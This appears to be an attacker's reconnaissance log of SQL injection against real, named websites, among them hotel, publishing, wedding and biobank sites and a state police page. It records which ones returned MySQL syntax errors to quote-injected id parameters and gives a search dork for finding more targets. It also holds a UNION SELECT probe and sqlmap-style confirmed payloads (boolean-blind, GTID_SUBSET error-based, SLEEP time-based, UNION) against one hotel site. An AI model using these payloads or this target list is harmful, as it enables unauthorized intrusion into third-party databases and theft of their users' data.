https://www.pbw-india.com/category.php?id=1           || cannot select category You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

https://www.lagnakaro.com/wedding-resources.php?id=1  || You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

https://biobank.ndph.ox.ac.uk/ukb/docs.cgi?id=1%27    || Sorry, internal error prevents display of document listing

http://www.embryohotel.com/room-detail.php?id=1       || You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

https://www.copalpublishing.com/books.php?id=1        || Conditional responce



inurl:"?id=1"  || 25 pages completed 

MAY BE 

https://police.rajasthan.gov.in/Officer_Details.aspx?id=1



http://www.embryohotel.com/room-detail.php?id=1       || You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

5 columns

'' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.embryohotel.com/room-detail.php?id=1

Parameter: id (GET)                                                                                                                                                                     
    Type: boolean-based blind                                                                                                                                                           
    Title: AND boolean-based blind - WHERE or HAVING clause                                                                                                                             
    Payload: id=1 AND 8736=8736                                                                                                                                                         
                                                                                                                                                                                        
    Type: error-based                                                                                                                                                                   
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)                                                                                      
    Payload: id=1 AND GTID_SUBSET(CONCAT(0x71786a7171,(SELECT (ELT(8466=8466,1))),0x7170627071),8466)                                                                                   
                                                                                                                                                                                        
    Type: time-based blind                                                                                                                                                              
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)                                                                                                                           
    Payload: id=1 AND (SELECT 8592 FROM (SELECT(SLEEP(5)))PDer)                                                                                                                         
                                                                                                                                                                                        
    Type: UNION query                                                                                                                                                                   
    Title: Generic UNION query (NULL) - 13 columns                                                                                                                                      
    Payload: id=-2468 UNION ALL SELECT NULL,NULL,CONCAT(0x71786a7171,0x72654f46454969795857704447656e5041627a696c56676d724574496470415067464b754275656f,0x7170627071),NULL,NULL,NULL,NUL
L,NULL,NULL,NULL,NULL,NULL,NULL-- -   

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------